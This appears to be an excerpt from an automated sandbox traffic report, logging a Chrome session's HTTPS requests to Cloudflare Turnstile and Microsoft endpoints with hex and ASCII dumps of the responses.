                                                                                                                                                                                                                                                Age: 4194
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82852ccdc32f-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC533INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 0a d8 49 44 41 54 78 9c dd 9b 7f 8c db 65 1d c7 5f 4f 73 6d 97 cb 85 bb 2c 75 59 96 73 59 49 9d 77 c7 24 c8 0c d1 8d 8e 1f 0a 0c b0 18 98 3a 56 6a 44 c6 cf 21 82 80 01 6f 25 86 ac 14 f9 35 24 82 0a a2 a0 d6 ca cf 09 96 20 28 99 93 3b 7e 38 06 22 ce eb c4 ba ce cb b2 10 68 2e bb cb 72 b9 5e 2f 7d fc e3 f3 7c d7 de 71 6d bf 4f af 77 18 df 49 f3 6d da ef e7 f9 3e cf e7 79 3e bf 3f 5f c5 02 c1 9b ce 3b 5f 3d c0 62 80 52 34 58 88 e5 34 c0 32 e0 88 f9 94 53 21 b5 50 d3 a2 6d 3e 07 f7 a6 f3 1d c0 2a 60 0d b0 1a e8 01 96 03 ed 40 1a b8 cc cc e1 4f 08 13 c6 80 5c 2c a7 f7 01 6f 00 83 40 2e 15 52 53 f3 35 c7 96 33 c0 9b ce b7 03 eb 81 4d c0 a9 40 a0 c6 ad 9e aa
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR@@iqIDATxe_Osm,uYsYIw$:VjD!o%5$ (;~8"h.r^/}|qmOwIm>y>?_;_=bR4X42S!Pm>*`@O\,o@.RS53M@
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: bc 05 fc cb 7c 07 f1 f6 ae 40 dc e4 4f 00 9f 05 8e a7 22 6a 65 e0 90 a1 6f 47 4c a0 1b 31 ec 00 9e 8c e5 f4 e7 52 21 35 5c eb a6 9a 51 87 37 9d 0f 01 7f c1 04 2e 4d 62 02 78 1e 78 04 d8 05 1c 29 45 83 75 09 62 39 ed 41 64 f9 3c a0 0b 78 0a 38 08 4c 21 a7 a6 0b 38 13 b8 06 61 56 23 bc 0a 7c 3e 15 52 13 b3 fd 39 2b 03 bc e9 bc 0f 09 50 1a 1e a1 1a 98 04 7e 09 dc 5e 8a 06 f7 3b 3f fa 23 71 90 e3 b9 14 d9 c9 0e 64 87 47 80 61 60 a4 98 49 b8 f2 f5 63 39 dd 06 5c 0a dc 43 63 27 2c 09 6c 9d 2d ca ac c5 80 eb cd c0 cd e0 6d e4 48 ef 2e 45 83 ce a2 bb 81 0b 80 73 11 73 b5 98 e9 3a a0 6c 3e c3 c0 d5 c5 4c e2 05 00 ad 75 1b b2 db 67 23 51 e4 08 30 00 3c a5 94 1a 33 9a 7e 3d 62 9a eb b9 c5 93 c0 da 54 48 ed 99 f9 c7 87 18 e0 4d e7 bb 11 f7 f6 18 d7 4b ae e0 61 e0 da
                                                                                                                                                                                                                                                Data Ascii: |@O"jeoGL1R!5\Q7.Mbxx)Eub9Ad<x8L!8aV#|>R9+P~^;?#qdGa`Ic9\Cc',l-mH.Ess:l>Lug#Q0<3~=bTHMKa
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC931INData Raw: 8a 30 8e f3 f3 0e 70 03 b0 b3 3f a0 ca 00 b1 9c 3e 09 29 f2 9e 5c 35 c6 86 54 48 cd 7a 02 40 7a 80 6c cd da c5 c0 ad 46 1f ec 07 c2 08 97 5b 89 32 f0 03 60 a3 59 7c 07 f0 24 d3 3d bf e3 11 e6 3f 99 2c e8 95 c9 82 26 15 52 bb 81 53 80 8b 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c
                                                                                                                                                                                                                                                Data Ascii: 0p?>)\5THz@zlF[2`Y|$=?,&RS]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.649732104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC413OUTGET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC441INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 47262
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82860baa18b4-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                                                                                                                Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                                                                                                                Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                                                                                                                Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                                                                                                                                                Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                                                                                                                                                Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                                                                                                                                                Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                                                                                                                                                Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                                                                                                                                                Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                13192.168.2.649731184.28.90.27443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                Cache-Control: public, max-age=25925
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                14192.168.2.649733104.18.95.414436088C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC764OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 164856
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 64 38 32 38 39 62 63 31 38 34 32 32 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccd8289bc184228-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:26 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
